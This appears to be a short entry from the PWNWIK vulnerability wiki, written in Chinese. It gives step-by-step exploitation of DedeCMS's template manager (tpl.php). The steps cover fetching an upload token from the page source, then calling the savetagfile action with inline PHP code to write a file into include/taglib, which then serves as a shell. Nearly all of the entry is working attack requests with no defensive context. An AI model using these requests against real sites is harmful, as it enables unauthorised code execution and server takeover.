PWNWIK.COM==免费、自由、人人可编辑的漏洞库
,
漏洞利用
首先获取token: domain + /dede/tpl.php?action=upload
通过查看页面源码即可获得 token
http://127.0.0.1/uploads/dede/tpl.php?action=upload
然后访问:
http://127.0.0.1/dede/tpl.php?filename=secnote.lib.php&action=savetagfile&content=<?php phpinfo();?>&token=<TOKEN>
Shell
http://127.0.0.1/include/taglib/secnote.lib.php
PWNWIK.COM